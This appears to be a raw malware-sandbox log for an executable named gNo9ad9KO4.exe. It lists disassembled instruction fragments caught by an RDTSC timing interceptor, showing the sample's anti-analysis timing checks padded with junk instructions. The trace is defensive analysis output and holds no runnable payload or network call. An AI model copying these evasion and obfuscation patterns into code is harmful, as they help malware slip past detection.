Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 542020C second address: 542026B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4688C929E7h 0x00000009 and esi, 19F0DA2Eh 0x0000000f jmp 00007F4688C929E9h 0x00000014 popfd 0x00000015 call 00007F4688C929E0h 0x0000001a pop eax 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F4688C929DDh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 542026B second address: 542029F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B771h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4688C1B778h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 542029F second address: 54202A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54202A3 second address: 54202A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54202A9 second address: 54202D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F4688C929DCh 0x00000008 pop ecx 0x00000009 movsx ebx, si 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f test esi, esi 0x00000011 jmp 00007F4688C929DAh 0x00000016 je 00007F46FA7A0D20h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54202D7 second address: 54202DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54202DB second address: 54202E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54202E1 second address: 5420319 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B774h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4688C1B777h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5420319 second address: 5420331 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C929E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5420331 second address: 542039F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F46FA729A4Fh 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F4688C1B774h 0x00000018 adc ecx, 42366918h 0x0000001e jmp 00007F4688C1B76Bh 0x00000023 popfd 0x00000024 push eax 0x00000025 push edx 0x00000026 pushfd 0x00000027 jmp 00007F4688C1B776h 0x0000002c jmp 00007F4688C1B775h 0x00000031 popfd 0x00000032 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 542039F second address: 54203A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54203A3 second address: 54203EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov edx, dword ptr [esi+44h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F4688C1B779h 0x00000013 jmp 00007F4688C1B76Bh 0x00000018 popfd 0x00000019 jmp 00007F4688C1B778h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54203EF second address: 5420426 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 mov ecx, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a or edx, dword ptr [ebp+0Ch] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 movzx eax, bx 0x00000013 pushfd 0x00000014 jmp 00007F4688C929DDh 0x00000019 sbb al, FFFFFF86h 0x0000001c jmp 00007F4688C929E1h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5420426 second address: 5420471 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 51h 0x00000005 pushfd 0x00000006 jmp 00007F4688C1B778h 0x0000000b and ch, 00000058h 0x0000000e jmp 00007F4688C1B76Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 test edx, 61000000h 0x0000001d pushad 0x0000001e mov ax, B22Bh 0x00000022 mov bx, cx 0x00000025 popad 0x00000026 jne 00007F46FA729989h 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5420471 second address: 5420477 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5410811 second address: 5410820 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5410820 second address: 5410826 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5410826 second address: 541082A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 541082A second address: 541082E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 541082E second address: 54108E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F4688C1B777h 0x0000000f and esp, FFFFFFF8h 0x00000012 pushad 0x00000013 mov cx, AA0Bh 0x00000017 pushad 0x00000018 push ecx 0x00000019 pop edx 0x0000001a pushfd 0x0000001b jmp 00007F4688C1B76Ah 0x00000020 jmp 00007F4688C1B775h 0x00000025 popfd 0x00000026 popad 0x00000027 popad 0x00000028 xchg eax, ebx 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F4688C1B76Ch 0x00000030 add ecx, 28E3CE78h 0x00000036 jmp 00007F4688C1B76Bh 0x0000003b popfd 0x0000003c popad 0x0000003d push eax 0x0000003e pushad 0x0000003f mov cx, bx 0x00000042 jmp 00007F4688C1B777h 0x00000047 popad 0x00000048 xchg eax, ebx 0x00000049 jmp 00007F4688C1B776h 0x0000004e xchg eax, esi 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F4688C1B76Ah 0x00000058 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54108E2 second address: 54108F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54108F1 second address: 54109A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B779h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F4688C1B771h 0x0000000f xchg eax, esi 0x00000010 jmp 00007F4688C1B76Eh 0x00000015 mov esi, dword ptr [ebp+08h] 0x00000018 pushad 0x00000019 pushad 0x0000001a mov dh, cl 0x0000001c call 00007F4688C1B779h 0x00000021 pop esi 0x00000022 popad 0x00000023 call 00007F4688C1B771h 0x00000028 pop ebx 0x00000029 popad 0x0000002a sub ebx, ebx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f jmp 00007F4688C1B774h 0x00000034 pushfd 0x00000035 jmp 00007F4688C1B772h 0x0000003a add eax, 094E5648h 0x00000040 jmp 00007F4688C1B76Bh 0x00000045 popfd 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54109A3 second address: 5410A84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c movzx ecx, bx 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pop ecx 0x00000013 popad 0x00000014 je 00007F46FA7A8399h 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F4688C929E7h 0x00000021 adc eax, 59B0CE9Eh 0x00000027 jmp 00007F4688C929E9h 0x0000002c popfd 0x0000002d pushfd 0x0000002e jmp 00007F4688C929E0h 0x00000033 adc ecx, 30B2C098h 0x00000039 jmp 00007F4688C929DBh 0x0000003e popfd 0x0000003f popad 0x00000040 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000047 pushad 0x00000048 pushad 0x00000049 pushfd 0x0000004a jmp 00007F4688C929E2h 0x0000004f sbb ax, 6AF8h 0x00000054 jmp 00007F4688C929DBh 0x00000059 popfd 0x0000005a popad 0x0000005b call 00007F4688C929DFh 0x00000060 mov eax, 45CE1B1Fh 0x00000065 pop esi 0x00000066 popad 0x00000067 mov ecx, esi 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007F4688C929DEh 0x00000070 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5410A84 second address: 5410A96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C1B76Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5410A96 second address: 5410AB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F46FA7A82DBh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4688C929DAh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5410AB0 second address: 5410AB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5410AB6 second address: 5410ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5410ABA second address: 5410B0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test byte ptr [76FB6968h], 00000002h 0x00000012 pushad 0x00000013 movzx ecx, bx 0x00000016 popad 0x00000017 jne 00007F46FA731043h 0x0000001d jmp 00007F4688C1B772h 0x00000022 mov edx, dword ptr [ebp+0Ch] 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushad 0x00000029 popad 0x0000002a jmp 00007F4688C1B773h 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5410B0D second address: 5410B35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx ebx, si 0x00000010 mov di, ax 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5410B35 second address: 5410B3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5410B3B second address: 5410B4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5410B4A second address: 5410B50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5410B50 second address: 5410B9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F4688C929DCh 0x00000010 sbb cl, FFFFFFC8h 0x00000013 jmp 00007F4688C929DBh 0x00000018 popfd 0x00000019 push eax 0x0000001a push edx 0x0000001b pushfd 0x0000001c jmp 00007F4688C929E6h 0x00000021 xor ah, 00000028h 0x00000024 jmp 00007F4688C929DBh 0x00000029 popfd 0x0000002a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5410B9E second address: 5410C4F instructions: 0x00000000 rdtsc 0x00000002 call 00007F4688C1B778h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push edx 0x0000000c pushad 0x0000000d movzx esi, dx 0x00000010 push edx 0x00000011 mov esi, 51A8011Bh 0x00000016 pop ecx 0x00000017 popad 0x00000018 mov dword ptr [esp], ebx 0x0000001b jmp 00007F4688C1B777h 0x00000020 push dword ptr [ebp+14h] 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F4688C1B774h 0x0000002a or esi, 01E4FC48h 0x00000030 jmp 00007F4688C1B76Bh 0x00000035 popfd 0x00000036 pushfd 0x00000037 jmp 00007F4688C1B778h 0x0000003c sbb ax, 3EA8h 0x00000041 jmp 00007F4688C1B76Bh 0x00000046 popfd 0x00000047 popad 0x00000048 push dword ptr [ebp+10h] 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e jmp 00007F4688C1B76Bh 0x00000053 mov ax, 408Fh 0x00000057 popad 0x00000058 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5410CDA second address: 5410CDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5410CDE second address: 5410CE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5410CE4 second address: 5410D15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esp, ebp 0x0000000b jmp 00007F4688C929E0h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F4688C929DAh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5410D15 second address: 5410D24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5420E07 second address: 5420E7C instructions: 0x00000000 rdtsc 0x00000002 mov bx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebx, esi 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c mov di, A6D2h 0x00000010 jmp 00007F4688C929E3h 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 pushad 0x00000018 mov eax, 19CD9A0Bh 0x0000001d jmp 00007F4688C929E0h 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F4688C929DEh 0x0000002c sbb ecx, 077A3348h 0x00000032 jmp 00007F4688C929DBh 0x00000037 popfd 0x00000038 mov dx, si 0x0000003b popad 0x0000003c pop ebp 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F4688C929DCh 0x00000046 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5420E7C second address: 5420E82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5420E82 second address: 5420E87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5420BBC second address: 5420BE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B776h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4688C1B76Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5420BE6 second address: 5420BFA instructions: 0x00000000 rdtsc 0x00000002 mov dx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dx, cx 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cl, 7Bh 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5420BFA second address: 5420C24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4688C1B777h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5420C24 second address: 5420C4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 2A4Ah 0x00000007 mov bh, A1h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4688C929E9h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5420C4D second address: 5420C5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C1B76Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5420C5D second address: 5420C61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5420C61 second address: 5420C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4688C1B76Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5420C76 second address: 5420C7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54A0682 second address: 54A0686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54A0686 second address: 54A068A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54A068A second address: 54A0690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54A0690 second address: 54A0696 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54A0696 second address: 54A069A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54A069A second address: 54A06D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F4688C929E0h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4688C929DEh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54A06D2 second address: 54A06D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54A06D8 second address: 54A06DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54A06DC second address: 54A070F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F4688C1B779h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4688C1B76Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54A070F second address: 54A071F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C929DCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54909F3 second address: 5490A33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007F4688C1B779h 0x0000000b and cx, 6646h 0x00000010 jmp 00007F4688C1B771h 0x00000015 popfd 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov ecx, edx 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5490A33 second address: 5490A39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5490A39 second address: 5490A70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov dh, BBh 0x0000000c mov bx, cx 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 push eax 0x00000013 movsx edi, cx 0x00000016 pop ecx 0x00000017 mov al, dl 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F4688C1B779h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5430271 second address: 5430277 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5430277 second address: 543027B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 543027B second address: 543028A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 543028A second address: 543028E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 543028E second address: 5430294 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5490CDA second address: 5490D68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, A7h 0x00000005 mov esi, 3B3E9733h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F4688C1B776h 0x00000013 mov ebp, esp 0x00000015 jmp 00007F4688C1B770h 0x0000001a push dword ptr [ebp+0Ch] 0x0000001d jmp 00007F4688C1B770h 0x00000022 push dword ptr [ebp+08h] 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F4688C1B76Eh 0x0000002c add cx, 4CC8h 0x00000031 jmp 00007F4688C1B76Bh 0x00000036 popfd 0x00000037 mov ah, 22h 0x00000039 popad 0x0000003a push 5DF8A268h 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F4688C1B777h 0x00000046 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5490D68 second address: 5490D9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 5DF9A26Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4688C929DDh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5490D9B second address: 5490DA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5490DDF second address: 5490DE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
